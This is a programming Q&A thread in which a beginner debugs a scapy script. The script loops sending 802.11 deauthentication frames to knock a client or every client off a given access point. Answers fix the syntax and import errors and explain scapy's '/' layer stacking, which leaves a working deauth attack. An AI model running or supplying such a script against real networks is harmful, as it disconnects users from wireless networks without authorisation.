# python3 and 2.7.6 giving me syntax error at while^ True

Tags: python-2.7, python-3.4, scapy

So i am testing this piece of code, (and i am fairly new to python),
but I tried running it with python 2.7.6 and python3 and they both gave me this error

> while True:
>           ^
>   SyntaxError: invalid syntax

(the arrow is pointing to the while)

and here is the code

```
import time
from scapy.all import *

iface = "mon0"
timeout = 1

if len(sys.argv) < 2:
 print (sys.argv[0] + " <bssid> [client]")
 sys.exit(0)

else:
 bssid = sys.argv[1]

if len(sys.argv) == 3:
 dest = sys.argv[2]

else:
 dest = "ff:ff:ff:ff:ff:ff"

pkt = radioTap() / \
 Dot11(subtype=0xc,
    addr1=dest, addr2=bssid, addr3=bssid / \
 Dot11Deauth(reason=3)


while True:
 print ("Sending deauth to " + dest)
 sendp(pkt,iface=iface)
 time.sleep(timeout)
```

if someone can also explain what does there " / \" do in python, ill be thankful.

Cheers

Comment: Where did you find this code? It's... not great. Try finding a more reputable source to learn from, or you'll end up making the same mistakes.

Comment: I rolled back your revision because questions should be reproducable.  Without the lines above, the error does not reproduce.

Answer (score 0):

A right bracket is missing

```
pkt = radioTap() / \
 Dot11(subtype=0xc,
    addr1=dest, addr2=bssid, addr3=bssid) / \
 Dot11Deauth(reason=3)
```

The symbol `\`  is used to break a long line into shorter ones, like

```
if a == True and \
   b == False
```

The operator `/` has been overloaded in the [`scapy` package](http://www.secdev.org/projects/scapy/doc/usage.html#stacking-layers),

> The / operator has been used as a composition operator between two layers. When doing so, the lower layer can have one or more of its defaults fields overloaded according to the upper layer. (You still can give the value you want).

There is also a typing error: [`RadioTap()`](https://fossies.org/dox/scapy-2.3.1/classscapy_1_1layers_1_1dot11_1_1RadioTap.html) should start with a capital R!

Comment: Thank you this work, Can i just ask how does the "/" come into play exactly? what does raioTap() / (The rest) do exactly ?

Comment: Alright thank you! I just ran it but it returned NameError: name 'radioTap' is not defined, i thought it should be defined via scapy import, is there any other reason this is not working ?

Comment: Pls see the `scapy` [documentation](http://www.secdev.org/projects/scapy/doc/usage.html) how to properly import the module and the basic API.

Comment: @user3676224 -- it seems to be a typing error. And try also to `from scapy.layers.dot11 import RadioTap`

Answer (score 0):

Try like this:

```
while (True):
 print ("Sending deauth to " + dest)
 sendp(pkt,iface=iface)
 time.sleep(timeout)
```